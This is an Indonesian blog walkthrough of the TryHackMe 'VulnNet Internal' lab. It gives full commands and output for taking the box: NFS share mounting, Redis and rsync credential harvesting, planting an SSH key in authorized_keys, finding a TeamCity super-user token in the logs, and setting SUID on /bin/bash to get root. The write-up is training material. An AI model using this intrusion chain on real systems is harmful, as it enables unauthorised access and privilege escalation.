Open in app

Sign in

Write

Sign in

Vulnet Internal TryHackme

laluwan_w
8 min readJan 9, 2023

--

Heelo kesempatanan kali ini saya akan mencoba menyelesaikan kotak Tryhackme. seperti biasa kotak ini saya akan lakukan dengan seperti menyerang kotak hitam di dunia nyata. pertama saya mulai memindai mechine menggunakan nmap.

wooxx@wanzroot:~/Documents/VulnNet-internal$ cat nmap.txt                
 # Nmap 7.93 scan initiated Sun Jan  8 03:18:46 2023 as: nmap -sC -sV -oN nmap.txt 10.10.216.235
 Nmap scan report for 10.10.216.235
 Host is up (0.29s latency).
 Not shown: 993 closed tcp ports (reset)
 PORT     STATE    SERVICE     VERSION
 22/tcp   open     ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
 | ssh-hostkey: 
 |   2048 5e278f48ae2ff889bb8913e39afd6340 (RSA)
 |   256 f4fe0be25c88b563138550ddd586abbd (ECDSA)
 |_  256 82ea4885f02a237e0ea9d9140a602fad (ED25519)
 111/tcp  open     rpcbind     2-4 (RPC #100000)
 | rpcinfo: 
 |   program version    port/proto  service
 |   100000  2,3,4        111/tcp   rpcbind
 |   100000  2,3,4        111/udp   rpcbind
 |   100000  3,4          111/tcp6  rpcbind
 |   100000  3,4          111/udp6  rpcbind
 |   100003  3           2049/udp   nfs
 |   100003  3           2049/udp6  nfs
 |   100003  3,4         2049/tcp   nfs
 |   100003  3,4         2049/tcp6  nfs
 |   100005  1,2,3      42801/tcp6  mountd
 |   100005  1,2,3      45197/udp   mountd
 |   100005  1,2,3      51815/tcp   mountd
 |   100005  1,2,3      51897/udp6  mountd
 |   100021  1,3,4      40543/tcp   nlockmgr
 |   100021  1,3,4      45643/tcp6  nlockmgr
 |   100021  1,3,4      53552/udp6  nlockmgr
 |   100021  1,3,4      57291/udp   nlockmgr
 |   100227  3           2049/tcp   nfs_acl
 |   100227  3           2049/tcp6  nfs_acl
 |   100227  3           2049/udp   nfs_acl
 |_  100227  3           2049/udp6  nfs_acl
 139/tcp  open     netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
 445/tcp  open     netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
 873/tcp  open     rsync       (protocol version 31)
 2049/tcp open     nfs_acl     3 (RPC #100227)
 9090/tcp filtered zeus-admin
 Service Info: Host: VULNNET-INTERNAL; OS: Linux; CPE: cpe:/o:linux:linux_kernel

 Host script results:
 |_clock-skew: mean: -20m00s, deviation: 34m37s, median: -1s
 | smb2-time: 
 |   date: 2023-01-08T08:27:37
 |_  start_date: N/A
 |_nbstat: NetBIOS name: VULNNET-INTERNA, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
 | smb2-security-mode: 
 |   311: 
 |_    Message signing enabled but not required
 | smb-security-mode: 
 |   account_used: guest
 |   authentication_level: user
 |   challenge_response: supported
 |_  message_signing: disabled (dangerous, but default)
 | smb-os-discovery: 
 |   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
 |   Computer name: vulnnet-internal
 |   NetBIOS computer name: VULNNET-INTERNAL\x00
 |   Domain name: \x00
 |   FQDN: vulnnet-internal
 |_  System time: 2023-01-08T09:27:37+01:00

 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
 # Nmap done at Sun Jan  8 03:27:46 2023 -- 1 IP address (1 host up) scanned in 539.44 seconds

Di sini saya menguji layanan NFS, dan saya mulai melakukan pengecekan.

wooxx@wanzroot:~/Documents/VulnNet-internal$ showmount -e 10.10.146.152  
 Export list for 10.10.146.152:
 /opt/conf *

Folder /opt/conf di share dan kita bisa me moutnnya dan masuk untuk melihat isinya.

wooxx@wanzroot:~/Documents/VulnNet-internal$ mkdir /tmp/vulnet                                   
                                                                                                                                                              
 wooxx@wanzroot:~/Documents/VulnNet-internal$ sudo mount -t nfs 10.10.146.152:/opt/conf /tmp/vulnet     
 [sudo] password for wooxx: 
                                                                                                                                                              
 wooxx@wanzroot:~/Documents/VulnNet-internal$ ls /tmp/vulnet     
 hp  init  opt  profile.d  redis  vim  wildmidi

menjelajahi beberapa folder/file dan menemukan kata sandi Redis di redis/redis,conf

wooxx@wanzroot:/tmp/vulnet/redis$ cat redis.conf | grep "pass"
 # 2) No password is configured.
 # If the master is password protected (using the "requirepass" configuration
 # masterauth <master-password>
 requirepass "B65Hx562F@ggAZ@F"
 # resync is enough, just passing the portion of data the slave missed while
 # 150k passwords per second against a good box. This means that you should
 # requirepass foobared

masuk dengan kredensial ke dalam basis data redis. dan saya menemukan text kredensial disandingkan base64.

ooxx@wanzroot:~/Documents/VulnNet-internal$ redis-cli -h 10.10.146.152 -a 'B65Hx562F@ggAZ@F' 
 Warning: Using a password with '-a' or '-u' option on the command line interface may not be safe.
 10.10.146.152:6379> KEYS *
 1) "marketlist"
 2) "internal flag"
 3) "tmp"
 4) "int"
 5) "authlist"
 10.10.146.152:6379> type "internal flag"
 string
 10.10.146.152:6379> type "authlist"
 list
 10.10.146.152:6379> GET authlist
 (error) WRONGTYPE Operation against a key holding the wrong kind of value
 10.10.146.152:6379> GET "internal flag"
 "THM{ff8e518addbbddb74531a724236a8221}"
 10.10.146.152:6379> LRANGE authlist 1 100
 1) "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg=="
 2) "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg=="
 3) "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg=="
 10.10.146.152:6379>

#Kredensial
 1) "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg=="
 2) "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg=="
 3) "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg=="

 from base64

rsync utilitas untuk mentransfer dan menyinkronkan file secara efisien antara komputer dan drive penyimpanan dan di seluruh komputer jaringan dengan membandingkan waktu modifikasi dan ukuran file. mari kita gunakan kredensial yang di temukan untuk masuk. pertama saya akan mengecek folder apa yang di bagikan.

wooxx@wanzroot:~/Documents/VulnNet-internal$ rsync 10.10.146.152::
    files           Necessary home interaction

saya masuk dan mengambil semua isi file di dalam folder files di atas.
hal menarik yang saya temukan adalah folder ssh. di sini kita bisa mengunggah kunci rsa pub.

wooxx@wanzroot:~/Documents/VulnNet-internal$ rsync -av rsync://rsync-connect@10.10.146.152/files files_target       
 Password: 
 receiving incremental file list
 created directory files_target
 ./
 sys-internal/
 sys-internal/.Xauthority
 sys-internal/.bash_history -> /dev/null
 sys-internal/.bash_logout
 sys-internal/.bashrc
 sys-internal/.dmrc
 sys-internal/.profile
 sys-internal/.ssh/
 sys-internal/.thumbnails/
 sys-internal/.thumbnails/large/
 sys-internal/.thumbnails/normal/
 sys-internal/.thumbnails/normal/2b53c68a980e4c943d2853db2510acf6.png
 sys-internal/.thumbnails/normal/473aeca0657907b953403884c53d865c.png
 sys-internal/.thumbnails/normal/539380d1cb60fcd744fd5094d314fdc1.png
 sys-internal/Desktop/
 sys-internal/Documents/
 sys-internal/Downloads/
 sys-internal/Music/
 sys-internal/Pictures/
 sys-internal/Public/
 sys-internal/Templates/
 sys-internal/Videos/

 wooxx@wanzroot:~/Documents/VulnNet-internal/files_target/sys-internal$ ls -la        
 total 108
 drwxr-xr-x 18 wooxx wooxx 4096 Feb  6  2021 .
 drwxr-xr-x  3 wooxx wooxx 4096 Feb  1  2021 ..
 lrwxrwxrwx  1 wooxx wooxx    9 Feb  1  2021 .bash_history -> /dev/null
 -rw-r--r--  1 wooxx wooxx  220 Feb  1  2021 .bash_logout
 -rw-r--r--  1 wooxx wooxx 3771 Feb  1  2021 .bashrc
 drwxrwxr-x  8 wooxx wooxx 4096 Feb  2  2021 .cache
 drwxrwxr-x 14 wooxx wooxx 4096 Feb  1  2021 .config
 drwx------  3 wooxx wooxx 4096 Feb  1  2021 .dbus
 drwx------  2 wooxx wooxx 4096 Feb  1  2021 Desktop
 -rw-r--r--  1 wooxx wooxx   26 Feb  1  2021 .dmrc
 drwxr-xr-x  2 wooxx wooxx 4096 Feb  1  2021 Documents
 drwxr-xr-x  2 wooxx wooxx 4096 Feb  1  2021 Downloads
 drwx------  3 wooxx wooxx 4096 Feb  1  2021 .gnupg
 drwxrwxr-x  3 wooxx wooxx 4096 Feb  1  2021 .local
 drwx------  5 wooxx wooxx 4096 Feb  1  2021 .mozilla
 drwxr-xr-x  2 wooxx wooxx 4096 Feb  1  2021 Music
 drwxr-xr-x  2 wooxx wooxx 4096 Feb  1  2021 Pictures
 -rw-r--r--  1 wooxx wooxx  807 Feb  1  2021 .profile
 drwxr-xr-x  2 wooxx wooxx 4096 Feb  1  2021 Public
 lrwxrwxrwx  1 wooxx wooxx    9 Feb  2  2021 .rediscli_history -> /dev/null
 drwxrwxr-x  2 wooxx wooxx 4096 Feb  6  2021 .ssh
 -rw-r--r--  1 wooxx wooxx    0 Feb  1  2021 .sudo_as_admin_successful
 drwxr-xr-x  2 wooxx wooxx 4096 Feb  1  2021 Templates
 drwx------  4 wooxx wooxx 4096 Feb  2  2021 .thumbnails
 -rw-------  1 wooxx wooxx   38 Feb  6  2021 user.txt
 drwxr-xr-x  2 wooxx wooxx 4096 Feb  1  2021 Videos
 -rw-------  1 wooxx wooxx   61 Feb  6  2021 .Xauthority
 -rw-r--r--  1 wooxx wooxx   14 Feb 12  2018 .xscreensaver
 -rw-------  1 wooxx wooxx 2546 Feb  6  2021 .xsession-errors
 -rw-------  1 wooxx wooxx 2546 Feb  6  2021 .xsession-errors.old
                                                                                                                                                               
 wooxx@wanzroot:~/Documents/VulnNet-internal/files_target/sys-internal$

Unggah file rsa.pub lalu saya mendapatkan akses awal.

wooxx@wanzroot:~/Documents/VulnNet-internal$ rsync -av /home/wooxx/.ssh/id_rsa.pub rsync://rsync-connect@10.10.146.152/files/sys-internal/.ssh/authorized_keys 
 Password: 
 sending incremental file list
 id_rsa.pub

 sent 677 bytes  received 35 bytes  40.69 bytes/sec
 total size is 568  speedup is 0.80
                                                                                                                                                               
 wooxx@wanzroot:~/Documents/VulnNet-internal$ ssh sys-internal@10.10.146.152 -i /home/wooxx/.ssh/id_rsa
 The authenticity of host '10.10.146.152 (10.10.146.152)' can't be established.
 ED25519 key fingerprint is SHA256:Hft/gU7OujMpBswfda4Gl0bN4EdP78+T0Iszs/Eq52c.
 This host key is known by the following other names/addresses:
     ~/.ssh/known_hosts:43: [hashed name]
 Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
 Warning: Permanently added '10.10.146.152' (ED25519) to the list of known hosts.
 Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-135-generic x86_64

 sys-internal@vulnnet-internal:~$

setelah melakukan cukup bnyak waktu untuk menjelajah directory, di directory root terdapat Folder Teamcity

sys-internal@vulnnet-internal:~$ ls /
bin   dev  home        initrd.img.old  lib64       media  opt   root  sbin  swapfile  TeamCity  usr  vmlinuz
boot  etc  initrd.img  lib             lost+found  mnt    proc  run   srv   sys       tmp       var  vmlinuz.old
sys-internal@vulnnet-internal:~$

sepertinya itu berjalan di localhost. saya membuat port portward menggunakan ssh. sebelum itu saya melakukan pengecekan port yang mendengarkan.

ys-internal@vulnnet-internal:~$ ss -ltp
State             Recv-Q             Send-Q                                Local Address:Port                                   Peer Address:Port             
LISTEN            0                  5                                           0.0.0.0:rsync                                       0.0.0.0:*                
LISTEN            0                  50                                          0.0.0.0:netbios-ssn                                 0.0.0.0:*                
LISTEN            0                  128                                         0.0.0.0:6379                                        0.0.0.0:*                
LISTEN            0                  128                                         0.0.0.0:sunrpc                                      0.0.0.0:*                
LISTEN            0                  128                                         0.0.0.0:60019                                       0.0.0.0:*                
LISTEN            0                  128                                   127.0.0.53%lo:domain                                      0.0.0.0:*                
LISTEN            0                  128                                         0.0.0.0:ssh                                         0.0.0.0:*                
LISTEN            0                  5                                         127.0.0.1:ipp                                         0.0.0.0:*                
LISTEN            0                  50                                          0.0.0.0:microsoft-ds                                0.0.0.0:*                
LISTEN            0                  128                                         0.0.0.0:33887                                       0.0.0.0:*                
LISTEN            0                  64                                          0.0.0.0:nfs                                         0.0.0.0:*                
LISTEN            0                  64                                          0.0.0.0:40229                                       0.0.0.0:*                
LISTEN            0                  128                                         0.0.0.0:45765                                       0.0.0.0:*                
LISTEN            0                  1                                [::ffff:127.0.0.1]:8105                                              *:*                
LISTEN            0                  5                                              [::]:rsync                                          [::]:*                
LISTEN            0                  50                                                *:44395                                             *:*                
LISTEN            0                  128                                           [::1]:6379                                           [::]:*                
LISTEN            0                  50                                             [::]:netbios-ssn                                    [::]:*                
LISTEN            0                  100                              [::ffff:127.0.0.1]:8111                                              *:*                
LISTEN            0                  128                                            [::]:40719                                          [::]:*                
LISTEN            0                  128                                            [::]:46415                                          [::]:*                
LISTEN            0                  128                                            [::]:sunrpc                                         [::]:*                
LISTEN            0                  128                                            [::]:ssh                                            [::]:*                
LISTEN            0                  5                                             [::1]:ipp                                            [::]:*                
LISTEN            0                  64                                             [::]:35899                                          [::]:*                
LISTEN            0                  128                                            [::]:43355                                          [::]:*                
LISTEN            0                  50                                             [::]:microsoft-ds                                   [::]:*                
LISTEN            0                  50                               [::ffff:127.0.0.1]:56255                                             *:*                
LISTEN            0                  64                                             [::]:nfs                                            [::]:*                
LISTEN            0                  50                                                *:9090                                              *:*

setelah mencoba semua port lokal yang ada, yang asli adalah 8111.membuka port dengan ssh portforward.

 wooxx@wanzroot:~/Documents/VulnNet-internal$ ssh -L 8000:127.0.0.1:8111 sys-internal@10.10.251.128 -i /home/wooxx/.ssh/id_rsa

mencoba beberpa kada sandi default gagal. periksa log in super user.

hmm seeprtinya kita membutuhkan token. mari menjelajah token di folder logs teamcity.

sys-internal@vulnnet-internal:/TeamCity/logs$ cat * | grep token 2>/dev/null
cat: catalina.2021-02-06.log: Permission denied
cat: catalina.2021-02-07.log: Permission denied
cat: catalina.2023-01-09.log: Permission denied
[TeamCity] Super user authentication token: 8446629153054945175 (use empty username with the token as the password to access the server)
[TeamCity] Super user authentication token: 8446629153054945175 (use empty username with the token as the password to access the server)
cat: [TeamCity] Super user authentication token: 3782562599667957776 (use empty username with the token as the password to access the server)
[TeamCity] Super user authentication token: 5812627377764625872 (use empty username with the token as the password to access the server)
[TeamCity] Super user authentication token: 3796375970133326145 (use empty username with the token as the password to access the server)
[TeamCity] Super user authentication token: 3796375970133326145 (use empty username with the token as the password to access the server)
[TeamCity] Super user authentication token: 3796375970133326145 (use empty username with the token as the password to access the server)

mencoba salah satu token dan valid.

setelah mencari tau cara agar mendapatkan access root, ternyata kita bisa menjalankan command line dari web tersebut. karna web di jalankan oleh user root otomatis di eksekusi oleh root.

buat project lalu di bagian build steps pilih command line dan di bagian command script kita memberika izin superuser di bash. simpan dan jalankan/run.

setelah selesai periksa file /bin/bash dan daaptkan benderanya.

sys-internal@vulnnet-internal:/TeamCity/logs$ ls -la /bin/bash
-rwsr-sr-x 1 root root 1113504 Apr  4  2018 /bin/bash
sys-internal@vulnnet-internal:/TeamCity/logs$ 


sys-internal@vulnnet-internal:/TeamCity/logs$ ls -la /bin/bash
-rwsr-sr-x 1 root root 1113504 Apr  4  2018 /bin/bash
sys-internal@vulnnet-internal:/TeamCity/logs$ /bin/bash -p
bash-4.4# id
uid=1000(sys-internal) gid=1000(sys-internal) euid=0(root) egid=0(root) groups=0(root),24(cdrom),1000(sys-internal)
bash-4.4#
Tryhackme Walkthrough
Pentesting
Cybersecurity
Hacking
Offensive Security

--

--

laluwan_w

Written by laluwan_w

11 Followers

Tidak mempunyai latar belakang.

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams